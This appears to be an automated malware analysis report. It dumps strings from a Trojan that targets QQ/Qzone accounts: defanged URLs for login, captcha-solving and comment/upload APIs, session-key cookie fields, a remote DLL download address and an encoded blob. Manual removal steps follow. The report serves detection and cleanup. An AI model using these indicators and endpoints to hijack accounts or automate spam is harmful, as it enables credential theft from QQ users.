POST /api.php?mod=yzm&act=point HTTP/1.1
/api.php?mod=yzm&act=point
POST /api.php?mod=yzm&act=register HTTP/1.1
/api.php?mod=yzm&act=register
dama3.hyslt.com
POST /api.php?mod=dmuser&act=yzm_error HTTP/1.1
/api.php?mod=dmuser&act=yzm_error
.hyslt.com
XXXXXX
hXXp://ip.qq.com/
POST /api.php?mod=yzm&act=server HTTP/1.1
/api.php?mod=yzm&act=server
7r7S7
9D62354B-2079-4449-A366-31997628A532
\data\uu.dll
SSSSh
ByScreen.JPG
operator
GetProcessWindowStation
E:\work\UUWiseHelper
\UUWiseHelper.pdb
GDI32.dll
RegOpenKeyExW
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
urlmon.dll
IPHLPAPI.DLL
WS2_32.dll
GetCPInfo
UUWiseHelper.DLL
uu_easyRecognizeUrlA
uu_easyRecognizeUrlW
uu_loginW
uu_recognizeByCodeTypeAndUrlA
uu_recognizeByCodeTypeAndUrlW
zcÁ
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
"0,01070
hXXp://api.ruokuai.com/register.xml
hXXp://api.ruokuai.com/info.xml
hXXp://api.ruokuai.com/recharge.xml
hXXp://api.ruokuai.com/create.xml
hXXp://api.ruokuai.com/reporterror.xml
\data\dc.dll
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
WSOCK32.dll
MSVCP60.dll
dc.dll
ReportError_A
VBYB_ReportError
VB_ReportError
debug.ini
ReportError:%s
Error:%s
%s|!|%s
\dms.pdb
%u%u,
dclog.txt
port
settimeout:%d
[%d]%s
reg2:%s
checkok:%s %s
check fail:%s %s %s
check:%s %s
getcjfail:%s %s
getcj:%s %s
%s%uout
%s%uin
put img ok:%s
put img fail:%s
put img:%s %s %d
get result ok:%s,%s
get result fail:%s
get result:%s
notifyfail ok:%s
notifyfail fail:%s,%s
notifyfail:%s
getimgok:%s,%s
getimg:%s
getinfo fail:%s
getinfo:%s,%s
setresult:%s,%s
HTTP/1.1 200 OK
recv:%d
send:%d
GET /ip.txt HTTP/1.1
Host: %s
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
select:%d
ioctlsocket:%d
socket:%d
api.qqchaoren.net
14.17.65.24
14.17.65.23
dama2.qqchaoren.net
dama1.qqchaoren.net
connect total:%s %d
:%s %d
connect discard:%s %d
[d-d-d d:d:d](u)
recv timeout:<%d>
recvfail:<%d>%d
server close:<%d>%d
recv:<%d>%d
send:<%d>%d
sendfail:<%d>%d
connect timeout:<%d>
connectok:<%d>%s %hu
127.0.0.1
1.1.3
1'1,1<1]2
9 9$9(9,9094989<9
hXXp://m.gutousoft.com/yzm/reportosft.php?card=&id=
hXXp://h5.qzone.qq.com/proxy/domain/taotao.qzone.qq.com/cgi-bin/emotion_cgi_re_feeds?g_tk=
hXXp://h5.qzone.qq.com/proxy/domain/b1.qzone.qq.com/cgi-bin/blognew/add_comment?g_tk=
/infocenter?ptsig=&topicId=
hXXp://h5.qzone.qq.com/proxy/domain/photo.qq.com/cgi-bin/common/cgi_add_piccomment_v2?g_tk=
hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareaddcomment?g_tk=
/main&topicId=
/myhome
&richtype=1&private=0&paramstr=1&qzreferrer=http://user.qzone.qq.com/
,nick:}
; p_skey=
Content-Disposition: form-data; name="skey"
skey
1.jpg
Content-Disposition: form-data; name="filename"; filename="1.jpg"
Content-Disposition: form-data; name="zzpanelkey"
Content-Disposition: form-data; name="p_skey"
Content-Disposition: form-data; name="backUrls"
hXXp://upbak.photo.qzone.qq.com/cgi-bin/upload/cgi_upload_image,hXXp://119.147.64.75/cgi-bin/upload/cgi_upload_image
Host: shup.photo.qzone.qq.com
hXXp://shup.photo.qzone.qq.com/cgi-bin/upload/cgi_upload_image?g_tk=
</url>
<url>
&dayspac=0&sidomain=qzonestyle.gtimg.cn&useutf8=1&outputhtmlfeed=1&rd=0.
hXXp://r.qzone.qq.com/cgi-bin/tfriend/getfriendmsglist.cgi?uin=
&msgTime=
&flag=100&key=
1970-01-01 08:00:00
\data\setsoft.ini
\update.exe
MSXML2.XMLHTTP
Microsoft.XMLHTTP
Can't create XMLHTTP connection object
Mozilla/4.0 (compatible; MSiE 6.0; Windows NT 5.1;)
application/x-www-form-urlencoded
errmsg_s
Comet.WndShadow
Comet.WndShadow.Color
Comet.WndShadow.Size
Comet.WndShadow.Proc
SysShadow
*.txt
skey=@[A-Za-z0-9]{3,};
skey=@[A-Za-z0-9]{3,};
(*.txt)|*.txt|
hXXp://VVV.gutou.cc/up/tongji.htm#
Bugreport
VBScript.RegExp
:|:czkey:|:
update.temp
b@.bak
password
x.yvr
x.yvkd
C:\Windows\
C:\Windows\bd.d
hXXp://m.gutousoft.com/yzm/bd.dll
1,2,5,6,7,8,11,12,21,51
\.pL.
Windows
KERNEL32.DLL
comctl32.dll
gdi32.dll
version.dll
wsock32.dll
rsadll.dll
\data\Gutou.ini
gutousoft.com
gutou.cc
COMCTL32.dll
MSIMG32.dll
MSVFW32.dll
SkinH_EL.dll
X@.gif
hXXp://ctc.qzonestyle.gtimg.cn/qzone/em/e
M@hXXp://ctc.qzonestyle.gtimg.cn/aoi/img/shuoshuo/emo/e10000
.AVVV.gutou.cc/?dengluqi
hXXp://VVV.gutou.cc
@@hXXp://gutou.cc
anonymous@123.com
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=https://qzs.qq.com/qzone/v6/portal/proxy.html&daid=5&&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=549000912&style=22&target=self&s_url=https://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone&from=iqq&pt_qr_app=
&pt_qr_link=http://z.qzone.com/download.html&self_regurl=https://qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=http://z.qzone.com/download.html&pt_no_auth=0
pt_login_sig=
login_sig:"
&u1=https://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone&from=iqq&r=0.
&appid=549000912&js_ver=10217&js_type=1&login_sig=
hXXps://ssl.ptlogin2.qq.com/check?regmaster=&pt_tea=2&pt_vcode=1&uin=
hXXps://ssl.captcha.qq.com/cap_union_new_gettype?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&uid=
hXXps://ssl.captcha.qq.com/cap_union_new_show?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=
websig:"
websig
hXXps://ssl.captcha.qq.com/cap_union_new_getcapbysig?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=
hXXps://ssl.captcha.qq.com/cap_union_new_verify?random=
&fpinfo=fpsig=10003984BBD51C3B52FD927E254E90E605658E8D6BF1CC645111B23EAF66D6F2F09DD5EEB20495B6A3053095B909E270B0A2&tlg=1&vlg=0_0_0&vmtime=_&vmData=
&websig=
aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=
Referer: hXXps://ssl.captcha.qq.com/cap_union_new_show?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=
&js_ver=10216&js_type=1&login_sig=
&pt_randsalt=2&u1=https://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone&from=iqq&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=1-
hXXps://ssl.ptlogin2.qq.com/login?u=
aq.qq.com/cn2/unionverify/
var p=$.Encryption.getEncryption(pwd,uid,code);

%original file name%.exe_3796_rwx_00401000_003DD000:

A1yWwtUixtgj9gnDMUUISlY0Elm8fH2Xgwng3ro8MHs4og5BmZdt1cHkSAPX8sFDiVmkLp1Ycv1jfxGNX2yKK3sDQUaNBKmRPOwh3ngD6czrytZsBRY6yejy6Wmb8OUYbflN lZmF02OBWfFnDhtvlgfXgOfZXzu0yjgCZzjBdK0IOdNU5VBmnEg9b1puMo0Rt/rGCRZAsdYymSpqPVD8WFsUWPySk2AefWYtQ3NFju tAYVIWIqmtpwScK5hOfXSXiCk0jthyk/1MHMmBqRZm4NUoVSP29U8NURhC9qmD9GYB/o9Vn9BSenpsyHXDDAcX72zEbn2RDQqD0l4gabn/pPllB7nDOXRfnMAxHmUUYxvHCtPIYLDRRg25YDjAsMZqCOLQS tZU/ vw65PgpPiPHC A9KqsCCVrYwwFcjhEMc9bP25esSGERNX5v8WlsREOrfY9/saOV3g8mUQ/FMzqokUtFQ3mGSPlOWmbCx66iB/zl7GJC0v1sduP0m6z1kv2clHSrkD5N0z VnTfhcf565o D0anX1RaJFcpMFvZTxyhupBG8GfYyCjfaARXZUgNV97faSX63T 1RcxTKUJ78hc9Wpr54Ud4y6svK9/jk5DUTcMULHO4yUNI aneNgGrXRK/i4fidArJqtkc5mYNTJCBAXrKERMojnFwpliUq9C6s6 LPIwB/5Yns/E0cpFp4Ep0/CZ lmiO5vdS1soFKXTVieYESplJ 9p28UWbOew9U6ZLTxNijwA3W7SHuT/5rekE5m3atcpLbpZff6ZMylNsdzyx8TF16vo VLXGdCX/3577uo8kdeHLHwBFLVoOh7SqxZFMDr5lkW/3XiTiL3TNmpZ4Vh1nhMqQEek8YMGcGStfN0mI23abFInwLmjV6N/PLM19Zprpi4nVM22X47VlGUeVNjk jKcNsBLSnGkdVtv55YEvNVMtDRYEqvZ1GLY0CTnzWThMxz6nJfJBLmLraBTgj1wpLiW5FU2rlf2LCuI4tB0/N1iNreMvHXgYhDZtZ2p2wpo tFDgx5ZyHsFSnSWh99Bt99gAWe0TCosnqlPSERGT4bXhhlzYzgZ18w5voJ8NM6kZnFTJ8zcnpVWcPpw2PnSuzoNElUq4C hLmj7r Tl fOL8OIPr/z0KpySnOT2U1OxvnZnc7hP2CWMrNfFt8r9bpZlf0RkFtT4sG1/7zJRC6El6m9KrHPtQtn8v8ESuQZ8t04rYsgKNWsHJD7vXF8z8iT4WcuCEhYCwn SPh487i6XS0USOWDZBVk6FVPQYv9 kEK98L8cV90Ty UYCVw8wCe54y5OmzOoz7Pl/Ea9Z7f7FN7Ke3EobpW5c20PdYstl7XEufeEwwripsre6FiYKRFlElw onXZay/mfYawx32N/F0keF046qkNip3vfg/tSg2P2CFcsWWkzrqResw3aOw MP 2yE3WnkcknIWk7Qo6TLhByvq/LJ6UF8iv7Z4TMynvu2rYK5FG1uJw7qqXPeoISPFT7a6UPhnJM3rPDTvk/utz2vAtgwGXXoqysDIGa 1i4fwRo0QLN46ovlyzciWOq9GndGZuPi8DN30xEN2En/J rAlf2QADqPJZP1m/LgjYVA7Ekqhru wtbYYspEaIigvx7nNDdm6ZqXIw4NBlZvPW1XHW7/t7jyyebT7aecpBWF F60PCPinI9yfhe6HIQAjBI=
%S4WD
hg%fpM
S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)
lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
COMCTL32.dll
MSIMG32.dll
MSVFW32.dll
SkinH_EL.dll
X@.gif
hXXp://ctc.qzonestyle.gtimg.cn/qzone/em/e
M@hXXp://ctc.qzonestyle.gtimg.cn/aoi/img/shuoshuo/emo/e10000
.AVVV.gutou.cc/?dengluqi
hXXp://VVV.gutou.cc
@@hXXp://gutou.cc
anonymous@123.com
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=https://qzs.qq.com/qzone/v6/portal/proxy.html&daid=5&&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=549000912&style=22&target=self&s_url=https://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone&from=iqq&pt_qr_app=
&pt_qr_link=http://z.qzone.com/download.html&self_regurl=https://qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=http://z.qzone.com/download.html&pt_no_auth=0
pt_login_sig=
login_sig:"
&u1=https://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone&from=iqq&r=0.
&appid=549000912&js_ver=10217&js_type=1&login_sig=
hXXps://ssl.ptlogin2.qq.com/check?regmaster=&pt_tea=2&pt_vcode=1&uin=
hXXps://ssl.captcha.qq.com/cap_union_new_gettype?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&uid=
hXXps://ssl.captcha.qq.com/cap_union_new_show?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=
websig:"
websig
hXXps://ssl.captcha.qq.com/cap_union_new_getcapbysig?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=
hXXps://ssl.captcha.qq.com/cap_union_new_verify?random=
&fpinfo=fpsig=10003984BBD51C3B52FD927E254E90E605658E8D6BF1CC645111B23EAF66D6F2F09DD5EEB20495B6A3053095B909E270B0A2&tlg=1&vlg=0_0_0&vmtime=_&vmData=
&websig=
aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=
Referer: hXXps://ssl.captcha.qq.com/cap_union_new_show?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=
&js_ver=10216&js_type=1&login_sig=
&pt_randsalt=2&u1=https://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone&from=iqq&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=1-
hXXps://ssl.ptlogin2.qq.com/login?u=
aq.qq.com/cn2/unionverify/

%original file name%.exe_3796_rwx_015D0000_00072000:


%original file name%.exe_3796_rwx_10000000_0003E000:



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    Bugreport.dll:512
    %original file name%.exe:2060

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\data\Bugreport.ini (48 bytes)
    C:\data\Bugreport_error.ini (1693 bytes)
    C:\%original file name%.exe (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S09T3NA0.txt (91 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\JR6VY9G6.txt (409 bytes)
    C:\data\Gutou.ini (676 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YAACNF8Y.txt (130 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\stat[1].htm (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\core[1].js (765 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\icon_11[1].gif (913 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\tongji[1].htm (952 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\X3F62G2R.txt (93 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\17287617[1].js (25 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\pic[1].gif (719 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\D9YRB8N4.txt (113 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HMGGW7AX.txt (261 bytes)
    C:\data\Bugreport.dll (629 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\stat[1].js (2459 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
